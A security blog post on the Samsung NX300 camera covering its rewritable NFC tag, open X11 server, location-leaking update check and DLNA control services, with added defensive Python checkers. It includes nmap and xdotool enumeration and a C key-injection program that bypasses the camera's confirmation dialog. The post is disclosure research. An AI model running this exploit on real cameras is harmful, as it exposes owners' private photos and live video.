Georg Lukas, 2014-05-07 18:45
The Samsung NX300 smart camera is a middle-class mirrorless camera with NFC and WiFi connectivity. You can connect it to your local WiFi network to upload directly to cloud services, share pictures via DLNA, or obtain remote access from your smartphone. For the latter, the camera provides the Remote Viewfinder and MobileLink modes, in which it creates an unencrypted access point with wide-open access to its X server and to data you would expect to be available only to your smartphone.
Because hardware engineers suck at software security, nothing else was to be expected. Nevertheless, the following will show how badly they suck, if only for documentation purposes.
This post covers only the network connectivity of the NX300. Read the follow-up posts for getting a root shell and adding features to the camera.
The smartphone app deserves some attention as well. Feel free to do your own research and post it to the project wiki.
The findings in this blog post are based on firmware version 1.31.
NFC Tag
The NFC “connectivity” is an NTAG203 made by NXP, pre-programmed with an NDEF message that downloads and launches the (horribly designed) Samsung SMART CAMERA App from Google Play and tells the app the access point name of this individual camera:
Type: MIME: application/com.samsungimaging.connectionmanager
Payload: AP_SSC_NX300_0-XX:XX:XX
Type: EXTERNAL: urn:nfc:ext:android.com:pkg
Payload: com.samsungimaging.connectionmanager
The tag is writable, so a malicious user can easily “hack” your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with a URL.
The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.
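A defender who wants to know whether a camera's tag has been tampered with can read the NDEF message back and compare it with the two records listed above. The following parser and check are an added example, not code from the original post: the record layout follows the NDEF specification, the expected MIME type and Android package name are the ones shown above, and the sample messages (including the "evil.example" URI) are constructed here for illustration.

```python
"""Parse NDEF messages and check that a camera tag still carries the expected records.

Added example (not from the original post). The sample messages built with
encode_record() are constructed; the record layout follows the NDEF spec.
"""
from dataclasses import dataclass

TNF_NAMES = {0: "empty", 1: "well-known", 2: "mime", 3: "absolute-uri",
             4: "external", 5: "unknown", 6: "unchanged"}

# Abbreviation table for NFC Forum "U" (URI) records: first payload byte.
URI_PREFIXES = {0x00: "", 0x01: "http://www.", 0x02: "https://www.",
                0x03: "http://", 0x04: "https://"}

# Records the camera ships with (from the tag dump above).
EXPECTED_MIME = b"application/com.samsungimaging.connectionmanager"
EXPECTED_PKG = b"com.samsungimaging.connectionmanager"
AP_PREFIX = b"AP_SSC_NX300_0-"


@dataclass
class NdefRecord:
    tnf: int
    type: bytes
    payload: bytes

    def describe(self) -> str:
        if self.tnf == 1 and self.type == b"U" and self.payload:
            prefix = URI_PREFIXES.get(self.payload[0], "")
            return f"URI: {prefix}{self.payload[1:].decode(errors='replace')}"
        return (f"{TNF_NAMES.get(self.tnf, '?')}: {self.type.decode(errors='replace')}"
                f" -> {self.payload.decode(errors='replace')}")


def encode_record(tnf, rtype, payload, first=False, last=False):
    """Build one short-record (SR, no ID field) NDEF record; used to construct samples."""
    assert len(rtype) < 256 and len(payload) < 256
    flags = 0x10 | (tnf & 0x07)          # SR bit + TNF
    if first:
        flags |= 0x80                    # MB: message begin
    if last:
        flags |= 0x40                    # ME: message end
    return bytes([flags, len(rtype), len(payload)]) + rtype + payload


def parse_ndef(data: bytes):
    """Decode all records of an NDEF message (short and long records, optional ID)."""
    records, pos = [], 0
    while pos < len(data):
        flags = data[pos]
        tnf, sr, il = flags & 0x07, bool(flags & 0x10), bool(flags & 0x08)
        type_len = data[pos + 1]
        pos += 2
        if sr:
            payload_len = data[pos]
            pos += 1
        else:
            payload_len = int.from_bytes(data[pos:pos + 4], "big")
            pos += 4
        id_len = 0
        if il:
            id_len = data[pos]
            pos += 1
        rtype = data[pos:pos + type_len]
        pos += type_len + id_len         # skip the ID field if present
        payload = data[pos:pos + payload_len]
        pos += payload_len
        records.append(NdefRecord(tnf, rtype, payload))
        if flags & 0x40:                 # ME terminates the message
            break
    return records


def check_camera_tag(data: bytes):
    """Return (ok, findings): ok only if the tag still holds the camera's own records."""
    findings = []
    records = parse_ndef(data)
    for r in records:
        if r.tnf == 1 and r.type == b"U":
            findings.append("URI record present, tag was rewritten: " + r.describe())
        elif r.tnf == 3:
            findings.append("absolute URI record present: " + r.describe())
    mime = [r for r in records if r.tnf == 2 and r.type == EXPECTED_MIME]
    aar = [r for r in records if r.tnf == 4 and r.type == b"android.com:pkg"]
    if not mime:
        findings.append("camera access-point record missing")
    elif not mime[0].payload.startswith(AP_PREFIX):
        findings.append("unexpected AP name: " + mime[0].payload.decode(errors="replace"))
    if not aar:
        findings.append("Android Application Record missing")
    elif aar[0].payload != EXPECTED_PKG:
        findings.append("AAR launches a different package: " + aar[0].payload.decode(errors="replace"))
    return (not findings), findings


if __name__ == "__main__":
    # Constructed sample: the records as shipped, with a made-up MAC suffix.
    shipped = (encode_record(2, EXPECTED_MIME, b"AP_SSC_NX300_0-12:34:56", first=True)
               + encode_record(4, b"android.com:pkg", EXPECTED_PKG, last=True))
    print(check_camera_tag(shipped))
```

The check deliberately treats any URI record as a finding, since the shipped message contains none; a tag that has been rewritten with the prank described above shows up as both "URI record present" and two missing records.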
WiFi Networking
You can configure the NX300 to join your WiFi network; it will then behave like a regular client with some open services, like DLNA. Let us see exactly what is offered by performing a port scan:
megavolt:~# nmap -sS -O nx300
Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
6000/tcp open X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
This scan was performed while the “E-Mail” application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp.
X Server
Wait, what? X11 as an open service? Can that be true? Surely it is access-locked via TCP to prevent abuse?
georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
fixed
georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
480x800 60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)
georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)
Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300
Nope! This really is an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera, the fun seems very limited:
X11 Key Bindings
A short investigation using xev shows that the physical keys on the camera body are bound to X11 key events as follows:
Camera key | X11 KeySym |
---|---|
On/Off | XF86PowerOff (only when turning off) |
Scroll Wheel | XF86ScrollUp / XF86ScrollDown |
Direct Link | XF86Mail |
Mode Wheel | F1 .. F10 |
Video Rec | XF86WebCam |
+/- | XF86Reload |
Menu | Menu |
Fn | XF86HomePage |
Keypad | KP_Left .. KP_Down, KP_Enter |
Play | XF86Tools |
Delete | KP_Delete |
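The xlsfonts run above answers the access-control question by simply working. For a defender who wants to verify the same thing on their own network without pulling in X client tools, the check below is an added example, not part of the original post: it speaks the X11 connection-setup handshake directly and reports whether the server accepts a connection with no authorization data. The request and reply layouts follow the X11 protocol; the host name and the two sample replies are constructed for illustration.

```python
"""Report whether an X server accepts connections without authorization.

Added example (not from the original post). probe() does the live check; the
two SAMPLE_* replies are constructed for offline use and mirror what Xorg
sends when it refuses ("No protocol specified") or accepts a client.
"""
import socket
import struct
import sys


def x11_setup_request():
    """Connection setup with no authorization protocol, little-endian ('l')."""
    # byte-order(1) pad(1) major(2) minor(2) auth-name-len(2) auth-data-len(2) pad(2)
    return b"l\x00" + struct.pack("<HHHHxx", 11, 0, 0, 0)


def parse_setup_reply(data: bytes):
    """Interpret an X11 setup reply.

    Returns (status, detail): status 0 = Failed (detail is the server's reason),
    1 = Success (detail is the vendor string), 2 = Authenticate.
    """
    if len(data) < 8:
        raise ValueError("truncated setup reply")
    status = data[0]
    if status == 0:
        reason_len = data[1]                       # length of reason, bytes 8..
        return 0, data[8:8 + reason_len].decode(errors="replace")
    if status == 1:
        vendor_len = struct.unpack_from("<H", data, 24)[0]
        return 1, data[40:40 + vendor_len].decode(errors="replace")
    if status == 2:
        return 2, data[8:].decode(errors="replace").rstrip("\x00")
    raise ValueError(f"unknown status byte {status}")


def server_is_open(reply: bytes) -> bool:
    """True when the server let an unauthenticated client in."""
    return parse_setup_reply(reply)[0] == 1


def probe(host: str, port: int = 6000, timeout: float = 3.0):
    """Connect to host:port, send the setup request and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(x11_setup_request())
        head = s.recv(8)
        extra = struct.unpack("<H", head[6:8])[0] * 4 if len(head) == 8 else 0
        body = b""
        while len(body) < extra:
            chunk = s.recv(extra - len(body))
            if not chunk:
                break
            body += chunk
        return parse_setup_reply(head + body)


# Constructed sample replies (not captured from the camera).
SAMPLE_REFUSED = (bytes([0, 21]) + struct.pack("<HHH", 11, 0, 6)
                  + b"No protocol specified" + b"\x00" * 3)
SAMPLE_ACCEPTED = (struct.pack("<BxHHH", 1, 11, 0, 13)
                   + struct.pack("<IIII", 11604000, 0x200000, 0x1FFFFF, 256)
                   + struct.pack("<HHBBBBBBBB", 20, 65535, 1, 0, 0, 0, 32, 32, 8, 255)
                   + b"\x00" * 4 + b"The X.Org Foundation")

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "nx300"   # assumed host name
    status, detail = probe(host)
    print({0: "refused", 1: "OPEN", 2: "needs auth"}[status], detail)
```

A status of 1 from a device you did not deliberately configure as an X terminal is the condition shown above; the usual mitigations are to keep such devices off networks you do not control and to firewall 6000/tcp at the access point, since the camera offers no way to enable X authorization itself.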
WiFi Client: Firmware Update Check
When the camera goes online, it performs a firmware version check. First, it retrieves http://gld.samsungosp.com:
Request:
GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
Host: gld.samsungosp.com
Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive
200 OK
This really looks like a no-op. But maybe this is a backdoor to allow
for remote code execution? Who knows…
Then, a query to http://ipv4.connman.net/online/status.html returns an empty document, but carries your location data (apparently derived from the IP address) in the headers:
X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin
Wow! They know where I live! At least they do not transmit any unique identifiers with the query.
As the last step, the camera asks for firmware versions and is redirected to an XML document with the ChangeLog. Known versions so far:
WiFi Access Point: UPnP/DLNA
Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung’s engineers were smart and added a user confirmation dialog to the camera UI to prevent remote abuse:
Unfortunately, this dialog is running on a wide-open X server, so all we need is to fake a KP_Return event (based on an example by bharathisubramanian), and we can connect with whichever client, stream a live video or download all the private pictures from the SD card, depending on the enabled mode:
/* Build with: gcc fakekey.c -o fakekey -lX11 -lXtst */
#include <unistd.h>
#include <X11/Xlib.h>
#include <X11/keysym.h>
#include <X11/extensions/XTest.h>

/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
    KeyCode keycode = 0, modcode = 0;
    keycode = XKeysymToKeycode (disp, keysym);
    if (keycode == 0) return;
    XTestGrabControl (disp, True);
    /* Generate modkey press */
    if (modsym != 0) {
        modcode = XKeysymToKeycode(disp, modsym);
        XTestFakeKeyEvent (disp, modcode, True, 0);
    }
    /* Generate regular key press and release */
    XTestFakeKeyEvent (disp, keycode, True, 0);
    XTestFakeKeyEvent (disp, keycode, False, 0);
    /* Generate modkey release */
    if (modsym != 0)
        XTestFakeKeyEvent (disp, modcode, False, 0);
    XSync (disp, False);
    XTestGrabControl (disp, False);
}
/* Main Function: connects to the display named in $DISPLAY */
int main (){
    Display *disp = XOpenDisplay (NULL);
    if (disp == NULL) return 1;
    sleep (1);
    /* Send Return */
    SendKey (disp, XK_Return, 0);
    XCloseDisplay (disp);
    return 0;
}
DLNA Service: Remote Viewfinder
The DLNA service exposes some camera features, which are queried and used by the Android app. The device’s friendly name is [Camera]NX300, as can be queried via HTTP from http://nx300:7676/smp_2_:
DMS-1.50
urn:schemas-upnp-org:device:MediaServer:1
[Camera]NX300
Samsung Electronics
http://www.samsung.com
Samsung Camera DMS
SP1
1.0
http://www.samsung.com
20081113 Folderview
smi,getMediaInfo.sec,getCaptionInfo.sec
uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
urn:schemas-upnp-org:service:ContentDirectory:1
urn:upnp-org:serviceId:ContentDirectory
/smp_4_
/smp_5_
/smp_3_
urn:schemas-upnp-org:service:ConnectionManager:1
urn:upnp-org:serviceId:ConnectionManager
/smp_7_
/smp_8_
/smp_6_
Additional SOAP services are provided for changing settings like focus and flash (/smp_3_):
Function | Arguments | Result |
---|---|---|
GetSystemUpdateID | Id | |
GetSearchCapabilities | SearchCaps | |
GetSortCapabilities | SortCaps | |
Browse | ObjectID BrowseFlag Filter StartingIndex RequestedCount SortCriteria | Result NumberReturned TotalMatches UpdateID |
GetIP | GETIPRESULT | |
GetInfomation | GETINFORMATIONRESULT StreamUrl | |
SetResolution | RESOLUTION | |
ZoomIN | CURRENTZOOM | |
ZoomOUT | CURRENTZOOM | |
MULTIAF | AFSTATUS | |
AF | AFSTATUS | |
setTouchAFOption | TOUCH_AF_OPTION | SET_OPTION_RESULT |
touchAF | AFPOSITION | TOUCHAF_RESULT |
AFRELEASE | AFRELEASERESULT | |
ReleaseSelfTimer | RELEASETIMER | |
Shot | AFSHOTRESULT | |
ShotWithGPS | GPSINFO | AFSHOTRESULT |
SetLED | LEDTIME | |
SetFlash | FLASHMODE | |
SetStreamQuality | Quality | |
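The table above mixes the four actions every UPnP ContentDirectory:1 service must offer with a long tail of vendor actions that drive the camera hardware. When auditing such a device, the useful question is "which actions go beyond the standard service template, and which of those take input?" The script below is an added example and not code from the original post or the camera: it parses a UPnP service description (SCPD) document and flags non-standard actions. The sample SCPD is constructed from a few action names in the table; the real document served at /smp_3_ is not reproduced here, and the keyword list used to mark hardware-control actions is a heuristic of this example.

```python
"""Audit a UPnP SCPD document for vendor actions beyond the standard service.

Added example (not from the original post). SAMPLE_SCPD is constructed from
action names in the table above; STANDARD_CONTENTDIRECTORY_ACTIONS lists the
actions of the UPnP ContentDirectory:1 service template.
"""
import xml.etree.ElementTree as ET

SCPD_NS = {"s": "urn:schemas-upnp-org:service-1-0"}

STANDARD_CONTENTDIRECTORY_ACTIONS = {
    "GetSearchCapabilities", "GetSortCapabilities", "GetSystemUpdateID", "Browse",
    "Search", "CreateObject", "DestroyObject", "UpdateObject", "ImportResource",
    "ExportResource", "StopTransferResource", "GetTransferProgress",
    "DeleteResource", "CreateReference",
}

# Heuristic: substrings (in action or argument names) that suggest hardware control.
HARDWARE_HINTS = ("shot", "flash", "led", "zoom", "af", "stream", "resolution", "timer")

# Constructed sample, modelled on the action table above (not the camera's own SCPD).
SAMPLE_SCPD = """<?xml version="1.0"?>
<scpd xmlns="urn:schemas-upnp-org:service-1-0">
  <actionList>
    <action><name>GetSystemUpdateID</name><argumentList>
      <argument><name>Id</name><direction>out</direction></argument>
    </argumentList></action>
    <action><name>Browse</name><argumentList>
      <argument><name>ObjectID</name><direction>in</direction></argument>
      <argument><name>Result</name><direction>out</direction></argument>
    </argumentList></action>
    <action><name>Shot</name><argumentList>
      <argument><name>AFSHOTRESULT</name><direction>out</direction></argument>
    </argumentList></action>
    <action><name>SetFlash</name><argumentList>
      <argument><name>FLASHMODE</name><direction>in</direction></argument>
    </argumentList></action>
    <action><name>GetInfomation</name><argumentList>
      <argument><name>GETINFORMATIONRESULT</name><direction>out</direction></argument>
      <argument><name>StreamUrl</name><direction>out</direction></argument>
    </argumentList></action>
  </actionList>
</scpd>"""


def parse_scpd(xml_text: str):
    """Map each action name to its list of (argument name, direction) pairs."""
    root = ET.fromstring(xml_text)
    actions = {}
    for action in root.findall("s:actionList/s:action", SCPD_NS):
        name = action.findtext("s:name", namespaces=SCPD_NS)
        args = [(a.findtext("s:name", namespaces=SCPD_NS),
                 a.findtext("s:direction", namespaces=SCPD_NS))
                for a in action.findall("s:argumentList/s:argument", SCPD_NS)]
        actions[name] = args
    return actions


def audit_actions(actions, standard=STANDARD_CONTENTDIRECTORY_ACTIONS):
    """List actions outside the standard template, with their input arguments
    and a heuristic flag for hardware control."""
    findings = []
    for name, args in actions.items():
        if name in standard:
            continue
        inputs = [arg for arg, direction in args if direction == "in"]
        haystack = (name + " " + " ".join(arg for arg, _ in args)).lower()
        findings.append({
            "action": name,
            "inputs": inputs,
            "hardware_control": any(h in haystack for h in HARDWARE_HINTS),
        })
    return findings


if __name__ == "__main__":
    for f in audit_actions(parse_scpd(SAMPLE_SCPD)):
        print(f)
```

Run against a real SCPD fetched from the device, the output is an inventory of everything a client on the camera's open access point can ask the service to do beyond browsing media, which is the list a risk assessment of the MobileLink and Remote Viewfinder modes should start from.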
Another service is available for picture / video streaming (/smp_4_):
version="1.0" encoding="utf-8"?>
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
5472 3648
1920 1080
off auto
auto
off auto
off
0
1
289
1
highlow
high
http://192.168.102.1:7679/livestream.avi
http://192.168.102.1:7679/qvga_livestream.avi
After triggering the right commands, a live video stream should be available from http://nx300:7679/livestream.avi. However, a brief attempt to get some video with wget or mplayer failed.
The “source code” package provided on Samsung’s OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), plus some scripts. The actual build root is hidden under the second paper-sheet link in the “Announcements” column.
Also, there are Obamapics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.
The project is built on an ancient version of
Tizen, on which I am no expert. Somebody else
needs to take this stuff apart, make a proper build environment, or port
OpenWRT to it.
Full series: